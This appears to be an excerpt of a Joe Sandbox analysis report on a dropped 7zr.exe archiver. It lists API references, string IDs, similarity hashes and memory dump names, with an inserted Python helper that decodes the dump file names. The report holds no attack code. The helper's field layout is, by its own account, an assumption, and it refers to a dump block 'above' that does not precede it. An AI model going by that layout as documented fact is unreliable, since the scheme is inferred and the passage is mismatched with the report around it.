                            • API ID: fputs$FreeString$H_prolog$ClearVariantfputc
                            • String ID: --$----$Path$Type$Warning: The archive is open with offset
                            • API String ID: 2889736305-3797937567
                            • Opcode ID: f7f9efdaaba80ddc52707a812ef9fbf8cd4b0f5b7ee8fa272d6f8a96ad6b153a
                            • Instruction ID: d5f99bf727fd7326f0624f3fd088cbe4360c0a3ee70b813f080a606033c67b50
                            • Opcode Fuzzy Hash: f7f9efdaaba80ddc52707a812ef9fbf8cd4b0f5b7ee8fa272d6f8a96ad6b153a
                            • Instruction Fuzzy Hash: 6C913B71A00605EFDB14DFA5DD85AAEB7B5FF48310F10412AE612E73A1DB70AE09DB60

                            Control-flow Graph: rendering omitted (entry 00CD6766, basic blocks 00CD6766-00CD695A)
                            APIs
                            • __EH_prolog.LIBCMT ref: 00CD676B
                            • EnterCriticalSection.KERNEL32(00D62938), ref: 00CD6781
                            • fputs.MSVCRT ref: 00CD680B
                            • LeaveCriticalSection.KERNEL32(00D62938), ref: 00CD6944
                              • Part of subcall function 00CDC7D7: fputs.MSVCRT ref: 00CDC840
                            • fputs.MSVCRT ref: 00CD6851
                              • Part of subcall function 00CA2201: fputs.MSVCRT ref: 00CA221E
                            • fputs.MSVCRT ref: 00CD68D9
                            • fputs.MSVCRT ref: 00CD68F6
                              • Part of subcall function 00CA1FA0: fputc.MSVCRT ref: 00CA1FA7
                            Similarity
                            • API ID: fputs$CriticalSection$EnterH_prologLeavefputc
                            • String ID: v$Sub items Errors:
                            • API String ID: 2670240366-2468115448
                            • Opcode ID: 8751419272c7992f119f50bb580d1c71f832dfa4a1783463f9bc52ec910ef66a
                            • Instruction ID: 4a1cd8ba45f18749123a19e79aef9e37e1978968f05e3c071a12c7bbad90a005
                            • Opcode Fuzzy Hash: 8751419272c7992f119f50bb580d1c71f832dfa4a1783463f9bc52ec910ef66a
                            • Instruction Fuzzy Hash: A851AA35501740CFCB24AFA4D8A4AAAB7E2FF85314F54442EE6AA87361CB307D44DB64

                            Control-flow Graph: rendering omitted (entry 00CD6359, basic blocks 00CD6359-00CD66FD)
                            APIs
                            • __EH_prolog.LIBCMT ref: 00CD635E
                            • fputs.MSVCRT ref: 00CD645F
                              • Part of subcall function 00CDC7D7: fputs.MSVCRT ref: 00CDC840
                            • fputs.MSVCRT ref: 00CD6547
                            • fputs.MSVCRT ref: 00CD665F
                            • fputs.MSVCRT ref: 00CD66AE
                              • Part of subcall function 00CA1F91: fflush.MSVCRT ref: 00CA1F93
                              • Part of subcall function 00CA1FB3: __EH_prolog.LIBCMT ref: 00CA1FB8
                              • Part of subcall function 00CA1E40: free.MSVCRT ref: 00CA1E44
                            Similarity
                            • API ID: fputs$H_prolog$fflushfree
                            • String ID: Can't allocate required memory$ERRORS:$WARNINGS:
                            • API String ID: 1750297421-1898165966
                            • Opcode ID: 1bf03b59c5762b771a2eeb263bce54a82667e73d53ec2e7ee15a4c4de5cd08d9
                            • Instruction ID: 133a1e7412bdd0022241b21977efe1b5c3f5e2ccbde6ad7ce1ae31874248ec44
                            • Opcode Fuzzy Hash: 1bf03b59c5762b771a2eeb263bce54a82667e73d53ec2e7ee15a4c4de5cd08d9
                            • Instruction Fuzzy Hash: F3B16D346017468FDB24EFA4C9A1BAAB7E1FF45304F04452EEA6A47392CB74AE44DF50
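                            The .sdmp names in every "Memory Dump Source" block above encode the region they were taken from, and the IDA snapshot name hcaresult_10_2_ca0000_7zr.jbxd appears to carry the same process id (10), stage (2), image base (0xCA0000) and module (7zr) in decimal. The helper below is an added example written for this report, not part of the Joe Sandbox output or of 7-Zip: it parses those names so a triager can see at a glance which dumps are the read-only PE header, the executable code, and the writable data of the 7zr image. The field order (pid . stage . id . base . protection . unknown . type . unknown) is an assumption inferred from the names on this page, not a published Joe Sandbox specification; the protection and type values are decoded with the real winnt.h constants, and the two fields whose meaning the page does not establish are kept raw. The sample input is the five names from the block above, copied as the page extraction left them.

```python
import re
from dataclasses import dataclass
from typing import List, Optional

# Real winnt.h constants: memory protection of a region and its allocation type.
PAGE_PROTECT = {
    0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
    0x08: "PAGE_WRITECOPY", 0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ",
    0x40: "PAGE_EXECUTE_READWRITE", 0x80: "PAGE_EXECUTE_WRITECOPY",
}
MEM_TYPE = {0x20000: "MEM_PRIVATE", 0x40000: "MEM_MAPPED", 0x1000000: "MEM_IMAGE"}

# ASSUMPTION: field order inferred from the names in this report, not from a
# published Joe Sandbox specification. Fields 6 and 8 are kept raw because
# their meaning is not established by anything on the page.
SDMP_RE = re.compile(
    r"(?P<pid>[0-9A-Fa-f]{8})\.(?P<stage>[0-9A-Fa-f]{8})\.(?P<uid>\d+)\."
    r"(?P<base>[0-9A-Fa-f]{16})\.(?P<protect>[0-9A-Fa-f]{8})\.(?P<f6>[0-9A-Fa-f]{8})\."
    r"(?P<mtype>[0-9A-Fa-f]{8})\.(?P<f8>[0-9A-Fa-f]{8})\.sdmp"
)


@dataclass
class Region:
    pid: int
    stage: int
    base: int
    protect: int
    mem_type: int
    raw_f6: str
    raw_f8: str

    @property
    def protect_name(self) -> str:
        return PAGE_PROTECT.get(self.protect, f"0x{self.protect:X}")

    @property
    def type_name(self) -> str:
        return MEM_TYPE.get(self.mem_type, f"0x{self.mem_type:X}")

    @property
    def writable(self) -> bool:
        return self.protect in (0x04, 0x08, 0x40, 0x80)

    @property
    def executable(self) -> bool:
        return self.protect in (0x10, 0x20, 0x40, 0x80)


def parse_sdmp(text: str) -> Optional[Region]:
    """Return the Region encoded in the first .sdmp name found in text, else None."""
    m = SDMP_RE.search(text)
    if not m:
        return None
    return Region(
        pid=int(m["pid"], 16), stage=int(m["stage"], 16), base=int(m["base"], 16),
        protect=int(m["protect"], 16), mem_type=int(m["mtype"], 16),
        raw_f6=m["f6"], raw_f8=m["f8"],
    )


def regions_from_report(lines: List[str]) -> List[Region]:
    """Collect every dump named in a 'Memory Dump Source' block, sorted by base.
    The regex ignores the 'Download File' link text and the ', Offset: ...' suffix
    that the HTML extraction leaves on each line."""
    found = [r for r in (parse_sdmp(line) for line in lines) if r is not None]
    return sorted(found, key=lambda r: r.base)


def describe(regions: List[Region]) -> List[str]:
    """One human-readable line per region, flagging executable (RX) and writable (RW) pages."""
    out = []
    for r in regions:
        flags = [f for f, on in (("RX", r.executable), ("RW", r.writable)) if on]
        out.append(f"pid {r.pid} stage {r.stage} base {r.base:08X} "
                   f"{r.protect_name} {r.type_name} {' '.join(flags)}".rstrip())
    return out


# Constructed input: the five dump names from the block above, as extracted.
REPORT_BLOCK = [
    "Source File: 0000000A.00000002.1795149048.0000000000CA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00CA0000, based on PE: true",
    "Associated: 0000000A.00000002.1795130448.0000000000CA0000.00000002.00000001.01000000.0000000A.sdmpDownload File",
    "Associated: 0000000A.00000002.1795219850.0000000000D4C000.00000002.00000001.01000000.0000000A.sdmpDownload File",
    "Associated: 0000000A.00000002.1795247299.0000000000D62000.00000004.00000001.01000000.0000000A.sdmpDownload File",
    "Associated: 0000000A.00000002.1795268226.0000000000D6B000.00000002.00000001.01000000.0000000A.sdmpDownload File",
]

if __name__ == "__main__":
    for line in describe(regions_from_report(REPORT_BLOCK)):
        print(line)
```

Run on the five names it reports one MEM_IMAGE at 0xCA0000 in process 10: a read-only page at the image base (the PE header), the only executable region at 0xCA1000 (where every 00CAxxxx..00D3xxxx ref in these listings resolves), two further read-only regions at 0xD4C000 and 0xD6B000, and a single PAGE_READWRITE region at 0xD62000, which is the dump to open first when looking for runtime state of the dropped 7zr tool rather than its code.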

                            Control-flow Graph (rendered graph not recoverable in text; executed/not-executed colouring lost, node list condensed)
                            • Function 00CA9C8F, 12 basic blocks ca9c8f-ca9d15
                            • ca9c8f-ca9cc2: GetModuleHandleA, GetProcAddress (GlobalMemoryStatusEx is resolved at run time rather than imported)
                            • ca9cc4-ca9ccc: GlobalMemoryStatusEx, taken when the lookup succeeds; ca9cef-ca9d06: GlobalMemoryStatus, taken when the lookup fails or the Ex call returns failure
                            • both paths converge at ca9d11-ca9d15
                            APIs
                            • GetModuleHandleA.KERNEL32(kernel32.dll,GlobalMemoryStatusEx), ref: 00CA9CB3
                            • GetProcAddress.KERNEL32(00000000), ref: 00CA9CBA
                            • GlobalMemoryStatusEx.KERNELBASE(00000040), ref: 00CA9CC8
                            • GlobalMemoryStatus.KERNEL32(?), ref: 00CA9CFA
                            Memory Dump Source
                            • Source File: 0000000A.00000002.1795149048.0000000000CA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00CA0000, based on PE: true
                            • Associated: 0000000A.00000002.1795130448.0000000000CA0000.00000002.00000001.01000000.0000000A.sdmp
                            • Associated: 0000000A.00000002.1795219850.0000000000D4C000.00000002.00000001.01000000.0000000A.sdmp
                            • Associated: 0000000A.00000002.1795247299.0000000000D62000.00000004.00000001.01000000.0000000A.sdmp
                            • Associated: 0000000A.00000002.1795268226.0000000000D6B000.00000002.00000001.01000000.0000000A.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_ca0000_7zr.jbxd
                            Similarity
                            • API ID: GlobalMemoryStatus$AddressHandleModuleProc
                            • String ID: $@$GlobalMemoryStatusEx$kernel32.dll
                            • API String ID: 180289352-802862622
                            • Opcode ID: 297f3ff86a04732c04c9413ecfe5f95bc93d7c2ac43c7a2008b7cb1bfcaf2605
                            • Instruction ID: 127cecaf99cce5e8185a9a8584ca969aa0b9d725336d4f1929bf5b163bd78591
                            • Opcode Fuzzy Hash: 297f3ff86a04732c04c9413ecfe5f95bc93d7c2ac43c7a2008b7cb1bfcaf2605
                            • Instruction Fuzzy Hash: FD11577491170A9FCF20DFA4D88ABADBBF5FB05319F200418E442EB280D778A984CF64

                            Memory Dump Source
                            • Source File: 0000000A.00000002.1795149048.0000000000CA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00CA0000, based on PE: true
                            • Associated: 0000000A.00000002.1795130448.0000000000CA0000.00000002.00000001.01000000.0000000A.sdmp
                            • Associated: 0000000A.00000002.1795219850.0000000000D4C000.00000002.00000001.01000000.0000000A.sdmp
                            • Associated: 0000000A.00000002.1795247299.0000000000D62000.00000004.00000001.01000000.0000000A.sdmp
                            • Associated: 0000000A.00000002.1795268226.0000000000D6B000.00000002.00000001.01000000.0000000A.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_ca0000_7zr.jbxd
                            Similarity
                            • API ID: _initterm$__getmainargs__p___initenv__p__commode__p__fmode__set_app_type
                            • String ID:
                            • API String ID: 4012487245-0
                            • Opcode ID: 9a981f9b6df6488dfa381b767e4f058cdf0cc7d437caad3c4a7e3e2932d86c49
                            • Instruction ID: f07f885cd00d3dc851fdf50e606f39342253757745ea6b55209dfd1fecdfa0c8
                            • Opcode Fuzzy Hash: 9a981f9b6df6488dfa381b767e4f058cdf0cc7d437caad3c4a7e3e2932d86c49
                            • Instruction Fuzzy Hash: D5211775941748EFCB109FA4EC46AA9BB78FB0AB20F14421AF651E23E1D7B45448CF31

                            Memory Dump Source
                            • Source File: 0000000A.00000002.1795149048.0000000000CA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00CA0000, based on PE: true
                            • Associated: 0000000A.00000002.1795130448.0000000000CA0000.00000002.00000001.01000000.0000000A.sdmp
                            • Associated: 0000000A.00000002.1795219850.0000000000D4C000.00000002.00000001.01000000.0000000A.sdmp
                            • Associated: 0000000A.00000002.1795247299.0000000000D62000.00000004.00000001.01000000.0000000A.sdmp
                            • Associated: 0000000A.00000002.1795268226.0000000000D6B000.00000002.00000001.01000000.0000000A.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_ca0000_7zr.jbxd
                            Similarity
                            • API ID: _initterm$FilterXcpt__getmainargs__p___initenv__setusermatherr_controlfpexit
                            • String ID:
                            • API String ID: 279829931-0
                            • Opcode ID: 3d681595eea76eaf9d4190580c9317161652acb840d4c587211e65f4c21f1f59
                            • Instruction ID: 2d6c2e030f87ae6aba9d05a296eaf829f11a70953daa7db50da582aa2582d7f7
                            • Opcode Fuzzy Hash: 3d681595eea76eaf9d4190580c9317161652acb840d4c587211e65f4c21f1f59
                            • Instruction Fuzzy Hash: 8E01E2B6911708AFDB04AFA0DC46CEEBB79FB09700B14041AF601A23A2DA759848CB30

                            APIs
                            • __EH_prolog.LIBCMT ref: 00CC185D
                              • Part of subcall function 00CC021A: __EH_prolog.LIBCMT ref: 00CC021F
                              • Part of subcall function 00CC062E: __EH_prolog.LIBCMT ref: 00CC0633
                            • _CxxThrowException.MSVCRT(?,00D56010), ref: 00CC1961
                              • Part of subcall function 00CC1AA5: __EH_prolog.LIBCMT ref: 00CC1AAA
                            Strings
                            • Duplicate archive path:, xrefs: 00CC1A8D
                            Memory Dump Source
                            • Source File: 0000000A.00000002.1795149048.0000000000CA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00CA0000, based on PE: true
                            • Associated: 0000000A.00000002.1795130448.0000000000CA0000.00000002.00000001.01000000.0000000A.sdmp
                            • Associated: 0000000A.00000002.1795219850.0000000000D4C000.00000002.00000001.01000000.0000000A.sdmp
                            • Associated: 0000000A.00000002.1795247299.0000000000D62000.00000004.00000001.01000000.0000000A.sdmp
                            • Associated: 0000000A.00000002.1795268226.0000000000D6B000.00000002.00000001.01000000.0000000A.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_ca0000_7zr.jbxd
                            Similarity
                            • API ID: H_prolog$ExceptionThrow
                            • String ID: Duplicate archive path:
                            • API String ID: 2366012087-4000988232
                            • Opcode ID: 4e89ee6f60b46ca54538a7fb7b4351fb78ee915b40372ae954603904195f6b92
                            • Instruction ID: 9c5055e107639acda2bf4380fba8e1cb249b516657713c848350e1ffc7b58fa4
                            • Opcode Fuzzy Hash: 4e89ee6f60b46ca54538a7fb7b4351fb78ee915b40372ae954603904195f6b92
                            • Instruction Fuzzy Hash: C0816935D00159DFCF15EFA5D891EDDBBB5AF19310F1440AEE912A32A2DB30AE05EB60

                            Control-flow Graph (rendered graph not recoverable in text; executed/not-executed colouring lost, node list condensed)
                            • Function cef1b2, basic blocks cef1b2-cef378; entry calls d3fb10 and cb1168, then cef3e4
                            • cef21c-cef22c: _CxxThrowException; cef231-cef248 and cef31a-cef355: memcpy; cef2f0-cef30c: memmove
                            • cef2a2-cef2b5 and cef2d1-cef2eb call cef37b; cef2b7-cef2cf calls d3e1a0
                            • exits through cef357-cef368 and cef36a-cef378
                            Memory Dump Source
                            • Source File: 0000000A.00000002.1795149048.0000000000CA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00CA0000, based on PE: true
                            • Associated: 0000000A.00000002.1795130448.0000000000CA0000.00000002.00000001.01000000.0000000A.sdmp
                            • Associated: 0000000A.00000002.1795219850.0000000000D4C000.00000002.00000001.01000000.0000000A.sdmp
                            • Associated: 0000000A.00000002.1795247299.0000000000D62000.00000004.00000001.01000000.0000000A.sdmp
                            • Associated: 0000000A.00000002.1795268226.0000000000D6B000.00000002.00000001.01000000.0000000A.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_ca0000_7zr.jbxd
                            Similarity
                            • API ID: H_prolog
                            • String ID:
                            • API String ID: 3519838083-0
                            • Opcode ID: 68e89ac230ff1c5c3eea434d3b3875357c20ec3750a1a4e98484fc30b41867f5
                            • Instruction ID: d412090b33da843086a5bfbf7196b9d201685518b12ed725f40ab13c8f8b01db
                            • Opcode Fuzzy Hash: 68e89ac230ff1c5c3eea434d3b3875357c20ec3750a1a4e98484fc30b41867f5
                            • Instruction Fuzzy Hash: 57517076A003499FDB10DFA6C8C5BBEB3B5FF88354F14842DE911AB251D774AA068B60

                            Control-flow Graph (rendered graph not recoverable in text; executed/not-executed colouring lost, node list condensed)
                            • Function ca6c72, basic blocks ca6c72-ca715f; entry calls d3fb10
                            • ca6ec7-ca6ec9: SetLastError; ca7099-ca70af: wcscmp
                            • subcalls include ca6bf5 (the GetFileAttributesW wrapper listed under APIs below), ca764c, ca1e40 (free), ca67f0, ca2f88, ca2e47, ca6848, ca6868, ca717b, ca8664, ca87df, ca88c6, ca87fa, ca85e2, ca8782, ca8578, ca9252, ca7b41, ca6bb5, ca22bf, ca2407, ca3221, ca31e5, ca2f1c, ca2e04, ca2fec, ca1089
                            • ca6e43-ca6e50 calls ca6c72 again (the function recurses)
                            • returns through ca7118-ca7126, reached from ca715d-ca715f and ca7116
                            APIs
                            • __EH_prolog.LIBCMT ref: 00CA6C77
                            • SetLastError.KERNEL32(00000002,-00000050,0000000F,-00000038,:$DATA,?,00000000,?), ref: 00CA6EC9
                              • Part of subcall function 00CA6C72: wcscmp.MSVCRT ref: 00CA70A5
                              • Part of subcall function 00CA6BF5: __EH_prolog.LIBCMT ref: 00CA6BFA
                              • Part of subcall function 00CA6BF5: GetFileAttributesW.KERNEL32(?,?,?,00000000,?), ref: 00CA6C1A
                              • Part of subcall function 00CA6BF5: GetFileAttributesW.KERNEL32(?,00000000,?,?,00000000,?), ref: 00CA6C49
                            Memory Dump Source
                            • Source File: 0000000A.00000002.1795149048.0000000000CA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00CA0000, based on PE: true
                            • Associated: 0000000A.00000002.1795130448.0000000000CA0000.00000002.00000001.01000000.0000000A.sdmp
                            • Associated: 0000000A.00000002.1795219850.0000000000D4C000.00000002.00000001.01000000.0000000A.sdmp
                            • Associated: 0000000A.00000002.1795247299.0000000000D62000.00000004.00000001.01000000.0000000A.sdmp
                            • Associated: 0000000A.00000002.1795268226.0000000000D6B000.00000002.00000001.01000000.0000000A.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_ca0000_7zr.jbxd
                            Similarity
                            • API ID: AttributesFileH_prolog$ErrorLastwcscmp
                            • String ID: :$DATA
                            • API String ID: 3316598575-2587938151
                            • Opcode ID: 6fa7cc6cea27ad903b1fa3b80b61ca00d2b023a347abcaf3428d24d5016076d4
                            • Instruction ID: 500d07d5e0def8076e4e8f100fe65767ab676e99715ea857401b77e31321a033
                            • Opcode Fuzzy Hash: 6fa7cc6cea27ad903b1fa3b80b61ca00d2b023a347abcaf3428d24d5016076d4
                            • Instruction Fuzzy Hash: 05E1043090020B9ACF25EFA4C895BEEB7B1FF1731CF184519E866672D1DB716A49DB10
                            APIs
                            • __EH_prolog.LIBCMT ref: 00CB6FCA
                              • Part of subcall function 00CB6E71: __EH_prolog.LIBCMT ref: 00CB6E76
                            Memory Dump Source
                            • Source File: 0000000A.00000002.1795149048.0000000000CA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00CA0000, based on PE: true
                            • Associated: 0000000A.00000002.1795130448.0000000000CA0000.00000002.00000001.01000000.0000000A.sdmp
                            • Associated: 0000000A.00000002.1795219850.0000000000D4C000.00000002.00000001.01000000.0000000A.sdmp
                            • Associated: 0000000A.00000002.1795247299.0000000000D62000.00000004.00000001.01000000.0000000A.sdmp
                            • Associated: 0000000A.00000002.1795268226.0000000000D6B000.00000002.00000001.01000000.0000000A.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_ca0000_7zr.jbxd
                            Similarity
                            • API ID: H_prolog
                            • String ID: Incorrect reparse stream$Unknown reparse stream$can't delete file
                            • API String ID: 3519838083-394804653
                            • Opcode ID: a4259277c80d0842ae5702d288e539b035122641ec16431653b31231dbac1d12
                            • Instruction ID: 5a140560ad96eade568b78257e1210a95a73585e0b1d4a3771d5d8929bf90b88
                            • Opcode Fuzzy Hash: a4259277c80d0842ae5702d288e539b035122641ec16431653b31231dbac1d12
                            • Instruction Fuzzy Hash: 2741A4729092849FCF21EFA9C4909EEFBF5AF99300F58456FE896A3201C6316F44C761
                            Memory Dump Source
                            • Source File: 0000000A.00000002.1795149048.0000000000CA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00CA0000, based on PE: true
                            • Associated: 0000000A.00000002.1795130448.0000000000CA0000.00000002.00000001.01000000.0000000A.sdmp
                            • Associated: 0000000A.00000002.1795219850.0000000000D4C000.00000002.00000001.01000000.0000000A.sdmp
                            • Associated: 0000000A.00000002.1795247299.0000000000D62000.00000004.00000001.01000000.0000000A.sdmp
                            • Associated: 0000000A.00000002.1795268226.0000000000D6B000.00000002.00000001.01000000.0000000A.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_ca0000_7zr.jbxd
                            Similarity
                            • API ID: fputs$H_prolog
                            • String ID: =
                            • API String ID: 2614055831-2525689732
                            • Opcode ID: 1a7867ed9436b5dee13a1b0cbf8ca21cd0f80d0c5ee54d6c8936546580c65ba7
                            • Instruction ID: 8aed857617441d7a07a32c34ce8d28d30d84040f9c5207da733eb1e86e66b0a9
                            • Opcode Fuzzy Hash: 1a7867ed9436b5dee13a1b0cbf8ca21cd0f80d0c5ee54d6c8936546580c65ba7
                            • Instruction Fuzzy Hash: 46218E32904119AFCF05EB94E946BEDBBB5EF45314F24002BE801722A1EF716E44EBA1
                            APIs
                            • __EH_prolog.LIBCMT ref: 00CD8346
                            • fputs.MSVCRT ref: 00CD835B
                            • fputs.MSVCRT ref: 00CD8364
                              • Part of subcall function 00CD83BF: __EH_prolog.LIBCMT ref: 00CD83C4
                              • Part of subcall function 00CD83BF: fputs.MSVCRT ref: 00CD8401
                              • Part of subcall function 00CD83BF: fputs.MSVCRT ref: 00CD8437
                            Memory Dump Source
                            • Source File: 0000000A.00000002.1795149048.0000000000CA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00CA0000, based on PE: true
                            • Associated: 0000000A.00000002.1795130448.0000000000CA0000.00000002.00000001.01000000.0000000A.sdmp
                            • Associated: 0000000A.00000002.1795219850.0000000000D4C000.00000002.00000001.01000000.0000000A.sdmp
                            • Associated: 0000000A.00000002.1795247299.0000000000D62000.00000004.00000001.01000000.0000000A.sdmp
                            • Associated: 0000000A.00000002.1795268226.0000000000D6B000.00000002.00000001.01000000.0000000A.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_ca0000_7zr.jbxd
                            Similarity
                            • API ID: fputs$H_prolog
                            • String ID: =
                            • API String ID: 2614055831-2525689732
                            • Opcode ID: eb0d756b8f7f0a945e274a92da43e326640ad3d16788c90937e530df83b4d2d2
                            • Instruction ID: cbfd76a25eb89d6428baa793e40d3ffa69f44c3f342f8148cd6ca1e6f8ea4231
                            • Opcode Fuzzy Hash: eb0d756b8f7f0a945e274a92da43e326640ad3d16788c90937e530df83b4d2d2
                            • Instruction Fuzzy Hash: B501F931A00109AFCF05BFA9CC12AEDBF75EF85714F00401AF905922A1CF754A45EBE1
                            APIs
                            • WaitForSingleObject.KERNEL32(00000000,000000FF,00000000,?,00000000,00CBAB57), ref: 00D37DAA
                            • GetLastError.KERNEL32(?,00000000,00CBAB57), ref: 00D37DBB
                            • CloseHandle.KERNELBASE(00000000,?,00000000,00CBAB57), ref: 00D37DCF
                            • GetLastError.KERNEL32(?,00000000,00CBAB57), ref: 00D37DD9
                            Memory Dump Source
                            • Source File: 0000000A.00000002.1795149048.0000000000CA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00CA0000, based on PE: true
                            • Associated: 0000000A.00000002.1795130448.0000000000CA0000.00000002.00000001.01000000.0000000A.sdmp
                            • Associated: 0000000A.00000002.1795219850.0000000000D4C000.00000002.00000001.01000000.0000000A.sdmp
                            • Associated: 0000000A.00000002.1795247299.0000000000D62000.00000004.00000001.01000000.0000000A.sdmp
                            • Associated: 0000000A.00000002.1795268226.0000000000D6B000.00000002.00000001.01000000.0000000A.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_ca0000_7zr.jbxd
                            Similarity
                            • API ID: ErrorLast$CloseHandleObjectSingleWait
                            • String ID:
                            • API String ID: 1796208289-0
                            • Opcode ID: 53980a36f97a0497920ebe3b2fbad877239f0a1257079eb0af2a42e9de1eeea6
                            • Instruction ID: 34f130bf508347090939ee6eec133ed630b0d6b886dc2c8001e30549e54a176a
                            • Opcode Fuzzy Hash: 53980a36f97a0497920ebe3b2fbad877239f0a1257079eb0af2a42e9de1eeea6
                            • Instruction Fuzzy Hash: A4F0FEB130DA02C7EB705EBDBC84B3666D8AF523B4F280725E561D26D0EA64CC409630
                            APIs
                            • __EH_prolog.LIBCMT ref: 00CC209B
                              • Part of subcall function 00CA757D: GetLastError.KERNEL32(00CAD14C), ref: 00CA757D
                              • Part of subcall function 00CC2C6C: __EH_prolog.LIBCMT ref: 00CC2C71
                              • Part of subcall function 00CA1E40: free.MSVCRT ref: 00CA1E44
                            Memory Dump Source
                            • Source File: 0000000A.00000002.1795149048.0000000000CA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00CA0000, based on PE: true
                            • Associated: 0000000A.00000002.1795130448.0000000000CA0000.00000002.00000001.01000000.0000000A.sdmp
                            • Associated: 0000000A.00000002.1795219850.0000000000D4C000.00000002.00000001.01000000.0000000A.sdmp
                            • Associated: 0000000A.00000002.1795247299.0000000000D62000.00000004.00000001.01000000.0000000A.sdmp
                            • Associated: 0000000A.00000002.1795268226.0000000000D6B000.00000002.00000001.01000000.0000000A.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_ca0000_7zr.jbxd
                            Similarity
                            • API ID: H_prolog$ErrorLastfree
                            • String ID: Cannot find archive file$The item is a directory
                            • API String ID: 683690243-1569138187
                            • Opcode ID: 5c8f8d5fca69229f47e3a56cd28dd36bfa947fc436b1dee663e1fc2141fe9334
                            • Instruction ID: 03a4cd45607525222ff0db51c02c6c3dfe30a0961d7fea471db078c49d3b930b
                            • Opcode Fuzzy Hash: 5c8f8d5fca69229f47e3a56cd28dd36bfa947fc436b1dee663e1fc2141fe9334
                            • Instruction Fuzzy Hash: 11724674D00259DFCB25DFA8C884BDEBBB5AF49304F14809EE859AB252CB709E81DF51
                            Memory Dump Source
                            • Source File: 0000000A.00000002.1795149048.0000000000CA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00CA0000, based on PE: true
                            • Associated: 0000000A.00000002.1795130448.0000000000CA0000.00000002.00000001.01000000.0000000A.sdmp
                            • Associated: 0000000A.00000002.1795219850.0000000000D4C000.00000002.00000001.01000000.0000000A.sdmp
                            • Associated: 0000000A.00000002.1795247299.0000000000D62000.00000004.00000001.01000000.0000000A.sdmp
                            • Associated: 0000000A.00000002.1795268226.0000000000D6B000.00000002.00000001.01000000.0000000A.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_ca0000_7zr.jbxd
                            Similarity
                            • API ID: CountTickfputs
                            • String ID: .
                            • API String ID: 290905099-4150638102
                            • Opcode ID: 9e031cafb32726dbdda8eddaf2bbf1a6bb4bce3b0115b2c5f248badf7ae63189
                            • Instruction ID: b7763a66a90d0ef4639feebc8c07308ee164a787429a20d518b5ff13ec230d7e
                            • Opcode Fuzzy Hash: 9e031cafb32726dbdda8eddaf2bbf1a6bb4bce3b0115b2c5f248badf7ae63189
                            • Instruction Fuzzy Hash: F8716B31600B069FCB25EF68C4D1AAAB7F6AF82304F00481EE59787681DB74FA45DB11
                            APIs
                              • Part of subcall function 00CA9C8F: GetModuleHandleA.KERNEL32(kernel32.dll,GlobalMemoryStatusEx), ref: 00CA9CB3
                              • Part of subcall function 00CA9C8F: GetProcAddress.KERNEL32(00000000), ref: 00CA9CBA
                              • Part of subcall function 00CA9C8F: GlobalMemoryStatusEx.KERNELBASE(00000040), ref: 00CA9CC8
                            • __aulldiv.LIBCMT ref: 00CE093F
                            • __aulldiv.LIBCMT ref: 00CE094B
                            Memory Dump Source
                            • Source File: 0000000A.00000002.1795149048.0000000000CA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00CA0000, based on PE: true
                            • Associated: 0000000A.00000002.1795130448.0000000000CA0000.00000002.00000001.01000000.0000000A.sdmp
                            • Associated: 0000000A.00000002.1795219850.0000000000D4C000.00000002.00000001.01000000.0000000A.sdmp
                            • Associated: 0000000A.00000002.1795247299.0000000000D62000.00000004.00000001.01000000.0000000A.sdmp
                            • Associated: 0000000A.00000002.1795268226.0000000000D6B000.00000002.00000001.01000000.0000000A.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_ca0000_7zr.jbxd
                            Similarity
                            • API ID: __aulldiv$AddressGlobalHandleMemoryModuleProcStatus
                            • String ID: 3333
                            • API String ID: 3520896023-2924271548
                            • Opcode ID: aa80bea9d6c22138b4e28b4c2bf2419a07f06abe99e39d7f84be716b64eca7ac
                            • Instruction ID: e2fbfd071cc27e5f3019863ec31c6292bd2457deea7e5c0f0e05f88193b690a1
                            • Opcode Fuzzy Hash: aa80bea9d6c22138b4e28b4c2bf2419a07f06abe99e39d7f84be716b64eca7ac
                            • Instruction Fuzzy Hash: 4A21B5B1D007486FE730DF6B8881A5BBAF9EB84711F14892EB186D3242D670A9408BB5
                            APIs
                              • Part of subcall function 00CA1E40: free.MSVCRT ref: 00CA1E44
                            • memset.MSVCRT ref: 00CCAEBA
                            • memset.MSVCRT ref: 00CCAECD
                              • Part of subcall function 00CE04D2: _CxxThrowException.MSVCRT(?,00D54A58), ref: 00CE04F8
                            Memory Dump Source
                            • Source File: 0000000A.00000002.1795149048.0000000000CA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00CA0000, based on PE: true
                             • Associated: 0000000A.00000002.1795130448.0000000000CA0000.00000002.00000001.01000000.0000000A.sdmp
